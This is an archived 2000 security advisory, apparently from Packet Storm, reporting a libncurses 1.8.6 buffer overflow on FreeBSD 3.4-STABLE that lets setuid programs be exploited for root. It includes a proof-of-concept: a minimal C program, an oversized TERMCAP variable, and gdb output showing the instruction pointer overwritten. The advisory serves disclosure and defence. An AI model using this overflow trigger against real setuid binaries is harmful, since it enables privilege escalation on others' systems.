BufferOverflow Security Advisory #3 - libncurses buffer overflow in NCURSES 1.8.6 on FreeBSD 3.4-STABLE. Setuid programs linked with libncurses can be exploited to obtain root access.
6498cacb6f034cf8c3e1a0d842966aaa _____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
Vendor: FreeBSD Inc.
WWW: www.freebsd.org
Severity: setuid programs linked with libncurses
can be exploited to obtain root access.
Author: venglin (venglin@freebsd.lublin.pl)
Homepage: www.b0f.com
* The Problem
lubi:venglin:~> cat tescik.c
#include <ncurses.h>
main() { initscr(); }
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies
of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
* Vulnerable Versions
- 3.4-STABLE -- vulnerable
- 4.0-STABLE -- not tested (probably *not* vulnerable)
- 5.0-CURRENT -- *not* vulnerable
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!